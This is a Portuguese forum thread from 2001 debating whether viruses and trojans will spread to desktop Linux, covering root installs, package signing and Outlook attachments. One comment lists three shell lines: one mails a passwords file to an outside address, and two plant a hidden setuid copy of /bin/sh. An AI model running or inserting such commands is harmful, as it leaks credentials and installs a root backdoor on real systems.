gildot

Topo
Sobre
FAQ
Tópicos
Autores
Preferências
Artigos
Sondagens
Propor artigo


8/3
gildicas
9/30
jobs
10/9
perguntas
10/25
press

 
Vírus em Linux?
Contribuído por BladeRunner em 17-12-01 21:20
do departamento probably-not
Linux Eis um artigo interessante que se refere aos rumores crescentes de que há medida que o Linux se for expandido para o Desktop, será inevitável o aparecimento de vírus para o nosso beloved pinguim.
Basicamente, o artigo diz que isso não é impossível, mas quase e dá todo o enfâse ao facto de enquanto no Windows se basear o desenvolvimento num determinado programa (Outlook), o software livre basear esse mesmo desenvolvimento em protocolos standard.

The next desktop | Linux, e Suites de Ofimática  >

 

gildot Login
Login:

Password:

Referências
  • Linux
  • artigo interessante
  • Mais acerca Linux
  • Também por BladeRunner
  • Esta discussão foi arquivada. Não se pode acrescentar nenhum comentário.
    Xarope e supositórios (Pontos:2)
    por Gimp em 18-12-01 10:31 GMT (#1)
    (Utilizador Info)
    é todo o arsenal que aconselho a quem ficar com o seu *nix infectado.


    "Gingó béu, gingó béu, gingó ól duei!" Gimp zZzZz

    Vírus (Pontos:1)
    por avalonagain em 18-12-01 10:34 GMT (#2)
    (Utilizador Info)
    Sim, é possível haver vírus em Linux.
    O Linux, como todos os sistemas, tem falhas. Não é impossível que um utilizador de Desktop, com mais ou menos conhecimentos de segurança, não caia na tentação ou não seja ludibriado a executar algum scr1pt que procure um exploit na máquina. Quantos de nós estudam a source antes de instalar um determinado programa? Garantem a 100% que o código que acabaram de compilar é 100% fidedigno?
    Um "simples hacking" dos servers DNS mais próximos de nós é quanto basta para redireccionar um pedido ao rpmfind ou outro para um sistema exactamente igual (quais são as hipóteses de isto acontecer?) e que contenha software malicioso.
    Tudo depende da frequência e da atenção que o admin do sistema dá a updates e patches. Neste cenário é possível um programa ganhar privilégios de root e instalar-se no kernel como um módulo "invisível". Ou até um binário vulgar do sistema, porque não? E alterar uma data de coisas... E esconder que o tamanho do ficheiro xpto mudou...
    O que este módulo faria, deixo à vossa consideração.
    ~avalon~ -- "Oh my gawd, they killed Tux! Bastards!"
    Virus... not quite (Pontos:1)
    por monkey em 18-12-01 10:37 GMT (#3)
    (Utilizador Info)
    Todos nós sabemos que quanto mais uma coisa (qualquer coisa) se torna mainstream e conhecida, maior é a vontade de a explorar, por parte dos utilizadores. Isto aplica-se, é claro, no caso do linux para home-users e virus-writers. Nunca tendo entendido o que leva alguem a escrever um vírus, isto para além da implicita capacidade de aprendizagem, sou forçado a discordar da escrita dos mesmos.

    De qualquer maneira, sou forçado a deduzir que vamos começar a ver mais virus em linux (ou pelo menos mais ameaças sob a forma de shell 'scr1pts', etc). Isto é inevitavel, e chega a ser engraçado dizerem que por *nix não ter o Outlook, nao tem virus. O problema nao é o outlook mas sim teenagers com demasiado tempo livre.

    Frederico Oliveira
    fred@box.sk

    PS: ao escrever um comentário no gildot, ao escrever s-c-r-i-p-t (sem os hifens, é logico), é automaticamente substituido por "scr1pt". Arranjem isto. É ridiculo, para não dizer degrandante. Fiquei mesmo decepcionado... É que o gildot é português, e supostamente sério. Fica a crítica.

    Re:Virus... not quite (Pontos:2)
    por Dehumanizer em 18-12-01 15:56 GMT (#10)
    (Utilizador Info)

    O problema nao é o outlook mas sim teenagers com demasiado tempo livre.

    Isto é como ter uma porta feita de papel ou cartolina, vendê-la como "segura", a casa ser assaltada (que surpresa!) e dizer que "a culpa é dos ladrões". :)


    "Prepare to be seduced by my Psycho-Power!"
    - M. Bison, Street Fighter Alpha 3

    Re:Virus... not quite (Pontos:1)
    por sena em 18-12-01 20:49 GMT (#17)
    (Utilizador Info) http://sena.u.smux.net/
    Por acaso, desculpa lá, mas a culpa é dos ladrões...

    Não é por eu deixar a porta de casa aberta, ou o carro destrancado que passa a ser legal roubar.. ;)

    Cumps, sena...


    Re:Virus... not quite (Pontos:2)
    por CrLf em 19-12-01 1:14 GMT (#18)
    (Utilizador Info) http://students.fct.unl.pt/~cer09566
    Não me parece que os ladrões se preocupem com a legalidade. Se deixares o carro destrancado vais ser roubado.

    -- Carlos Rodrigues
    Re:Virus... not quite (Pontos:2)
    por Dehumanizer em 19-12-01 14:23 GMT (#19)
    (Utilizador Info)
    Não estou a desculpar os ladrões. Mas a empresa que te vendeu uma porta de cartolina como sendo "segura" TEM culpa.


    "Prepare to be seduced by my Psycho-Power!"
    - M. Bison, Street Fighter Alpha 3
    Re:Virus... not quite (Pontos:1)
    por avalonagain em 18-12-01 11:18 GMT (#5)
    (Utilizador Info)
    Julgo que é propositado, para evitar malandrices... Mas há sempre maneira de se dar a volta: script ;-)
    ~avalon~ -- "Oh my gawd, they killed Tux! Bastards!"
    Bug or feature (Pontos:1)
    por raxx7 em 18-12-01 12:23 GMT (#6)
    (Utilizador Info) http://raxx7.no.sapo.pt/
    O tópico é interessante e dá panos para mangas mas o artigo não fazia muito sentido.
    O problema do Outlook não é um bug, é uma feature intencional que foi aproveitada para fins maliciosos: a capacidade de correr atachments automaticamente quando abres o mail, com o objectivo de adicionar mais funcionalidade ao mail. A mesma questão põe-se com as macros do Word Excel, etc que são executadas quando abres o documento (se bem me lembro o ILOVEYOU era uma macro num documento de Word).
    E também se põe quanto ao javascript e applets de Java que encontramos por nas páginas da web.
    Não há uma solução universal para esta questão: minimizar os riscos de segurança implica perder potenciais funcionalidades. Contudo, a escolha não tem de ser ON/OFF. Poderiamos, por exemplo, criar ambientes restrictos onde correr este código, definindo os parâmetros com base na origem do código.
    Trabalhar como utilizador não priveligiado num sistema multi-utilizador é por si uma forma de ambiente restricto que limita o potencial deste tipo de virus ao que o utilizador pode fazer.

    Quanto ao software que, como utilizador priveligiado, instalamos e usamos, é uma questão de ter cuidado com o que metemos nos nossos sistemas: garantir que o software provém de fontes de confiança e que não foi adulterado. Ou correr o risco...
    A Red Hat já assina os pacotes, a Debian caminha para lá. As outras distros não sei.
    Claro que com a vulgarização do Linux cada vez vai haver mais superutilizadores que não vão ter os cuidados devidos.

    Finalmente, bugs como Code Red e Nimda realmente exploram bugs. Mas os bugs arranjam-se. Quanto mais depressa fizerem os vírus, mais depressa se arranjam os bugs que eles exploram. ;-)

    Remember to be the Killer, not the Victim! (Nuklear Girl)

    Re:Bug or feature (Pontos:2)
    por Dehumanizer em 18-12-01 15:58 GMT (#11)
    (Utilizador Info)

    O problema do Outlook não é um bug, é uma feature intencional que foi aproveitada para fins maliciosos: a capacidade de correr atachments automaticamente quando abres o mail, com o objectivo de adicionar mais funcionalidade ao mail.

    Mas isso é uma idéia ! É como uma porta sem fechadura... sem dúvida é mais "prático" não termos de andar com a chave, não é?

    E contudo...


    "Prepare to be seduced by my Psycho-Power!"
    - M. Bison, Street Fighter Alpha 3

    Re:Bug or feature (Pontos:1)
    por raxx7 em 18-12-01 17:11 GMT (#14)
    (Utilizador Info) http://raxx7.no.sapo.pt/
    «Mas isso é uma idéia má!»
    Isso é subjectivo. Pessoalmente, se tivesse essa opção no meu MUA habitual, desligava-a. Mas cada um é senhor do seu nariz.
    E como disse, o Outlook não é a única origem deste tipo de problemas. Muitos (a maior parte?) dos utilizadores abre um documento no Word ou Excel que tenha recebido por email sem se preocupar se ele tem ou não macros AutoOpen. E acho que não passa pela cabeça a ninguém remover o suporte a isso.

    Remember to be the Killer, not the Victim! (Nuklear Girl)
    Nopes, virus nao. Trojans sim. (Pontos:2)
    por Cyclops em 18-12-01 13:44 GMT (#7)
    (Utilizador Info) http://greymalkin.yi.org
    O conceito de virus nao faz sentido num sistema gnu/linux, dado aproveitar-se de falhas no sistema para se replicar e causar os danos. Estas falhas podem ser agrupadas em "classes" de falhas.

    Uma vez detectada uma classe (as vezes ate pode ser pelo surgir de um virus) esta classe sera rapidamente corrigida, sem necessidade de qualquer anti-virus.

    Claro que a isto deve-se descontar a possibilidade de virus aplicacionais, por exemplo, se o mutt ou o evolution decidissem comecar a correr scr1pts automaticamente para fazer o utilizador feliz (vide outlook).
    Exploits devido a buffer overflows e semelhantes no parsing do email, cai na area das classes de falhas.

    Quanto a trojan horses, esses nao ha hipotese de lhe dar a volta. Mesmo um anti-virus so seria capaz de dar a volta se corresse o program numa sandbox, na qual teria de ter uma copia do sistema, e depois comparar a sandbox com o sistema e verificar o que foi ou nao alterado indevidamente. Mas isto e uma questao de ficcao cientifica, de momento, ou para quem pode ($$), de hosts e maquinas virtuais dentro maquinas virtuais.

    O problema dos virus nao e quem os escreve, mas a existencia de falhas que levam a possibilidade de adquirir previlegios indesejados. Nalguns ambientes isto e facil de corrigir, noutros nao. Mais uma vantagem a favor do software livre em relacao ao software proprietario.

    Outra maneira de reduzir as probabilidades e _NUCA_CORRER_COISAS_COMO_ROOT_ _ESPECIALMENTE_SE_NAO_SAO_DE_CONFIANCA_. Quanto aqui se metem a instalar o gnu/linux e correr tudo como root? Va, comecem a corar. Espero que a mior parte nao faca asneiras destas, mas se calhar a maior parte ja e capaz de ir buscar o software xpto que surgiu na freshmeat, e fazer configure make make install como root. Porque? em cada um destes passos pode estar a ser enviado o ficheiro de passwords do sistema para algum lado, por exemplo :)

    Afinal, quando eram pequeninos as vossas mamas nao vos diziam para nao aceitarem presentes de estranhos? Julgam que so por por terem mais de 18 aninhos que isso deixa de ser valido? Apenas muda o contexto, meus caros :)

    Hugs, Cyclops
    Re:Nopes, virus nao. Trojans sim. (Pontos:1)
    por raxx7 em 18-12-01 14:34 GMT (#8)
    (Utilizador Info) http://raxx7.no.sapo.pt/
    A definição de vírus é software malicioso com a capacidade de infectar um sistema e de se replicar. Faz perfeito sentido em Linux. De acordo com esta definição, um cavalo de tróia (software malicioso que abre buracos nas medidas de segurança) pode ou não ser classificado como um vírus.
    Não tem nada a ver com aproveitar bugs (os mais de 50.000 que existem para DOS/Windows não precisam de nenhuma falha para obter privilégios porque estes não existem) ou meio de propagação (adulteração de executáveis/bibliotecas, email, ect).BR
    Remember to be the Killer, not the Victim! (Nuklear Girl)
    Re:Nopes, virus nao. Trojans sim. (Pontos:2)
    por Gamito em 18-12-01 15:24 GMT (#9)
    (Utilizador Info)
    configure make make install como root
    Isto não significa forcosamente que se venha a ter o software a correr como root.

    Mário Gamito
    "Make everything as simple as possible... but not simpler"
    Albert Einstein
    Re:Nopes, virus nao. Trojans sim. (Pontos:2)
    por mlopes em 18-12-01 16:39 GMT (#12)
    (Utilizador Info)
    Os configure costumam ser shell scr1pts, executar um shell scr1pt feito por sabe-se lá quem, como root é sempre um risco, até porque é pouco provável que seja procedimento geral, verificar o que faz esse shell scr1pt.

    Por outro lado, se eu não confio no scr1pt configure o mais provável é não confiar na aplicação que estou a instalar, com tal não a deveria então instalar e executar.
    Re:Nopes, virus nao. Trojans sim. (Pontos:2)
    por mlopes em 18-12-01 16:42 GMT (#13)
    (Utilizador Info)
    Os configure costumam ser shell scripts, executar um shell script feito por sabe-se lá quem, como root é sempre um risco, até porque é pouco provável que seja procedimento geral, verificar o que faz esse shell script.

    Por outro lado, se eu não confio no script configure o mais provável é não confiar na aplicação que estou a instalar, com tal não a deveria então instalar e executar.
    Re:Nopes, virus nao. Trojans sim. (Pontos:2, Interessante)
    por raxx7 em 18-12-01 17:30 GMT (#16)
    (Utilizador Info) http://raxx7.no.sapo.pt/
    Isso leva-nos à questão de garantir que o software que instalamos é de confiança.
    Na debian-security está uma t hread sobre as possibilidades de um mirror da adulterar os pacotes de forma a comprometer a segurança do sistema.

    Remember to be the Killer, not the Victim! (Nuklear Girl)
    Re:Nopes, virus nao. Trojans sim. (Pontos:2)
    por Cyclops em 20-12-01 1:24 GMT (#20)
    (Utilizador Info) http://greymalkin.yi.org
    Dai que se utilize o gpg para alguma coisa :)
    3 coisas (Pontos:1)
    por raxx7 em 18-12-01 17:16 GMT (#15)
    (Utilizador Info) http://raxx7.no.sapo.pt/
    mail -s passwords cracker@hotmail.com
    cp /bin/sh /bin/.sh
    chmod u+s /bin/.sh


    Remember to be the Killer, not the Victim! (Nuklear Girl)

     

     

    [ Topo | FAQ | Editores | Contacto ]